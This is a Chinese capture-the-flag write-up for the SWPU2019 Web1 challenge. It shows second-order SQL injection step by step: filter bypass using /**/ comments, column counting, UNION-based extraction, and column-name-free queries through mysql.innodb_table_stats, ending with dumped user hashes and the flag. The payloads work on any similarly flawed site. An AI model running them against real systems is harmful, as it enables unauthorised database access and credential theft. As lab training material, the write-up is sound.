[SWPU2019]Web1

一、题目分析

网页有登录 注册 广告发布页面,认为是sql注入,每个页面测试后,发现没有注入的地方。字仔细观察后,发现发布过的广告里面,有sql语法报错信息。由此判断存在二次注入。

广告详情


You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''11'' limit 0,1' at line 1

广告名广告内容状态
未查找到相关广告信息

二、解题

经过测试,过滤有空格和 #, --+, and、or 还有很多常用的关键字。

1 检查数据库列数

1'/**/group/**/by/**/25,'

广告详情


Unknown column '23' in 'group statement'

广告名广告内容状态
未查找到相关广告信息

检查到22时发现不报找不到列数了,即该表有22列。、

2 查看回显位置

1'/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22'

广告详情

广告名广告内容状态
23待管理确认

回显的位置时2,3号位置。

 没有办法使用information_schema,发现还有其他表如mysql.innodb_table_statssys.schema_table_statistics_with_buffer可以看表名、数据库名,就是没有列名。

3无列名注入

#获取表名

1'/**/union/**/select/**/1,(select/**/group_concat(table_name)/**/from/**/mysql.innodb_table_stats/**/where/**/database_name=database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22'

广告详情

广告名广告内容状态
ads,users3待管理确认

#获取各列

user表一般都是id ,name ,password三列

1'/**/union/**/select/**/1,(select/**/group_concat(b)/**/from/**/(select/**/1,2/**/as/**/b,3/**/union/**/select/**/*/**/from/**/users)a),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22'

广告详情

广告名广告内容状态
2,flag,admin,tt3待管理确认

#获取数据

1'/**/union/**/select/**/1,(select/**/group_concat(b)/**/from/**/(select/**/1,2,3/**/as/**/b/**/union/**/select/**/*/**/from/**/users)a),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22'

广告详情

广告名广告内容状态
3,flag{a79305ee-a263-477d-a14d-e7b25c2f3fd7},53e217ad4c721eb9565cf25a5ec3b66e,c4ca4238a0b923820dcc509a6f75849b3待管理确认

 

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

半两八金

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值